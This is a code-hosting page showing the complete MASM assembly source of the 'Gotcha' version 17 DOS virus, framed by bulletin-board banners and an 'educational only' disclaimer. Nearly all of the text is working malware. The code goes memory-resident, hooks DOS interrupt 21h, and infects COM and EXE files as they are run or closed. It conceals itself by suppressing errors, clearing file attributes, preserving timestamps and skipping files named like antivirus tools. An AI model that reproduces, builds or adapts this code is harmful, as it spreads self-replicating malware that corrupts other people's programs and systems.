-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathGOTCHA17.ASM
503 lines (393 loc) · 17.9 KB
/
GOTCHA17.ASM
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;****************************************************************************
;* Gotcha version 17
;*
;* Compile with MASM 4.0
;* (other assemblers will probably not produce the same result)
;*
;* Disclaimer:
;* This file is only for educational purposes. The author takes no
;* responsibility for anything anyone does with this file. Do not
;* modify this file!
;****************************************************************************
.RADIX 16
cseg segment
assume cs:cseg,ds:cseg,es:nothing
VERSION equ 17d
FILELEN equ end - start
RESPAR equ (FILELEN/16d) + 18d
BUFLEN equ 18
ENVLEN equ signature- envstring
COMSIGN equ 0
EXESIGN equ 1
;****************************************************************************
;* Dummy program (infected)
;****************************************************************************
org 0100
begin: db 0E9, BUFLEN+1, 0 ;jump to virus entry
;****************************************************************************
;* Data
;****************************************************************************
org 0103
start:
buffer db 0CDh, 20 ;original code
db (BUFLEN-2) dup (?)
comexe db COMSIGN ;dummy program is a COM program
;****************************************************************************
;* Install the virus
;****************************************************************************
call start2
start2: pop si
sub si,(BUFLEN+4) ;si = begin virus
mov di,0100
cld
cmp byte ptr cs:[si+BUFLEN],COMSIGN
jz entryC
entryE: mov ax,ds ;calculate CS
add ax,10
add ax,cs:[si+16]
push ax ;push new CS on stack
push cs:[si+14] ;push new IP on stack
jmp short entcheck
entryC: push cs ;push new CS on stack
push di ;push new IP on stack
push di
push si
movsw ;restore old file-begin
movsb
pop si
pop di
entcheck: mov ax,0DADA ;already installed?
int 21
cmp ah,0A5
je entstop
mov ax,3000 ;test DOS version >= 3.1?
int 21
xchg ah,al
cmp ax,030A
jb entstop
push ds
push es
mov ax,ds ;adjust memory-size
dec ax
mov ds,ax
cmp byte ptr ds:[0000],5A
jnz cancel
mov ax,ds:[0003]
sub ax,low RESPAR
jb cancel
mov ds:[0003],ax
sub word ptr ds:[0012],low RESPAR
mov es,ds:[0012] ;copy program to top
push cs
pop ds
mov cx,FILELEN
rep movsb
mov ds,cx ;get original int21 vector
mov si,4*21
movsw ;move it to the end
movsw
push es ;set vector to new handler
pop ds
mov dx,offset ni21-3
mov ax,2521
int 21
cancel: pop es
pop ds
entstop: db 0CBh ;retf
;****************************************************************************
;* Interupt 24 handler
;****************************************************************************
ni24: mov al,3
iret
;****************************************************************************
;* Interupt 21 handler
;****************************************************************************
ni21: pushf
cmp ax,0DADA ;install-check ?
je do_DADA
push dx
push cx
push bx
push ax
push si
push di
push ds
push es
cmp ah,3E ;close ?
jne vvv
mov ah,45 ;duplicate handle
jmp short doit
vvv: cmp ax,4B00 ;execute ?
jne exit
mov ah,3Dh ;open the file
doit: int 21
jc exit
xchg ax,bx
call infect
exit: pop es
pop ds
pop di
pop si
pop ax
pop bx
pop cx
pop dx
popf
org21: jmp dword ptr cs:[oi21-3] ;call to old int-handler
do_DADA: mov ax,0A500+VERSION ;return a signature
popf
iret
;****************************************************************************
;* Close the file
;****************************************************************************
close: mov ah,3E ;close the file
pushf
push cs
call org21
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
push bx
mov ah,62 ;get segment-adres of PSP
int 21
mov ds,bx ;get seg-adres of environment
mov es,ds:[002C]
xor di,di
pop bx
push cs
pop ds
envloop: mov si,offset envstring-3 ;check the environment
mov cx,ENVLEN
repz cmpsb
jz close ;exit if item found
dec di ;goto next item
xor al,al
mov ch,0FF
repnz scasb
cmp byte ptr es:[di],0 ;finnished environment?
jnz envloop
mov ax,3300 ;get ctrl-break flag
int 21
push dx
cwd ;clear the flag
inc ax
push ax
int 21
mov dx,bx
mov ax,3524 ;get int24 vector
int 21
push bx
push es
mov bx,dx
push cs
pop ds
mov dx,offset ni24 ;set int24 vector
mov ah,25
push ax
int 21
mov ax,1220 ;get file-table entry
push bx
push ax
int 2F
mov bl,es:[di]
pop ax
sub al,0A
int 2F
pop bx
push es
pop ds
push [di+2] ;save attribute & open-mode
push [di+4]
cmp word ptr [di+28],'XE' ;check extension
jne not_exe
cmp byte ptr [di+2A],'E'
jmp short check
not_exe: cmp word ptr [di+28],'OC'
jne close1v
cmp byte ptr [di+2A],'M'
check: je check_name
close1v: jmp close1
check_name: cmp byte ptr [di+20],'V' ;name is V*.* ?
je close1v
cmp byte ptr [di+20],'F' ;name is F*.* ?
je close1v
mov cx,7 ;name is *SC*.* ?
mov ax,'CS'
push di
add di,21
SCloop: dec di
scasw
loopnz SCloop
pop di
je close1v
mov byte ptr [di+2],2 ;open for read/write
mov byte ptr [di+4],0 ;clear attributes
call getlen
mov cl,3
sub ax,cx ;goto signature
sbb dx,0
call goto
push ax ;save old offset
push dx
push cs
pop ds
mov si,0100 ;read signature
mov dx,si
mov ah,3F
int 21
cmp word ptr [si],'!A' ;already infected?
je close2v
call gotobegin
mov cl,BUFLEN ;read begin
mov dx,si
mov ah,3F
int 21
cmp word ptr [si],5A4Dh ;EXE ?
jz do_EXE
cmp word ptr [si],4D5A
jz do_EXE
do_COM: mov byte ptr [si+BUFLEN],COMSIGN
cmp byte ptr es:[di+12],0FC ;check length
jnb close2
cmp byte ptr es:[di+12],3
jbe close2
call writeprog ;write program to end of file
jnz close2
mov byte ptr [si],0E9h ;JMP xxxx'
call getoldlen
add ax,(BUFLEN-2)
mov word ptr [si+1],ax
jmp short done
close2v: jmp short close2
do_EXE: mov byte ptr [si+BUFLEN],EXESIGN
call writeprog ;write program to end of file
jnz close2
call getlen ;calculate new length
mov cx,0200 ;put new length in header
div cx
inc ax
mov word ptr [si+4],ax
mov word ptr [si+2],dx
call getoldlen ;calculate new CS & IP
mov cx,0010
div cx
sub ax,word ptr [si+8]
mov word ptr [si+16],ax ;put CS in header
add dx,BUFLEN+1
mov word ptr [si+14],dx ;put IP in header
done: call gotobegin
mov cx,BUFLEN ;write new begin
mov dx,si
mov ah,40
int 21
close2: push es
pop ds
pop dx ;restore old offset in file
pop ax
call goto
or byte ptr [di+6],40 ;no time-change
close1: call close
or byte ptr [di+5],40 ;no EOF on next close
pop [di+4] ;restore attribute & open-mode
pop [di+2]
pop ax ;restore int24 vector
pop ds
pop dx
int 21
pop ax ;restore ctrl-break flag
pop dx
int 21
ret
;****************************************************************************
;* Get original length of program
;****************************************************************************
getoldlen: call getlen
sub ax,FILELEN
sbb dx,0
ret
;****************************************************************************
;* Get length of program
;****************************************************************************
getlen: mov ax,es:[di+11]
mov dx,es:[di+13]
ret
;****************************************************************************
;* Goto new offset DX:AX
;****************************************************************************
gotobegin: xor ax,ax
cwd
goto: xchg ax,es:[di+15]
xchg dx,es:[di+17]
ret
;****************************************************************************
;* Write virus to the file
;****************************************************************************
writeprog: call getlen
call goto
mov cx,FILELEN ;write virus
mov dx,si
mov ah,40
int 21
cmp cx,ax ;are all bytes written?
ret
;****************************************************************************
;* Text and Signature
;****************************************************************************
envstring db 'E=mcý',0
signature: db 'GOTCHA!',0 ;I have got you! :-)
oi21:
end:
cseg ends
end begin
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;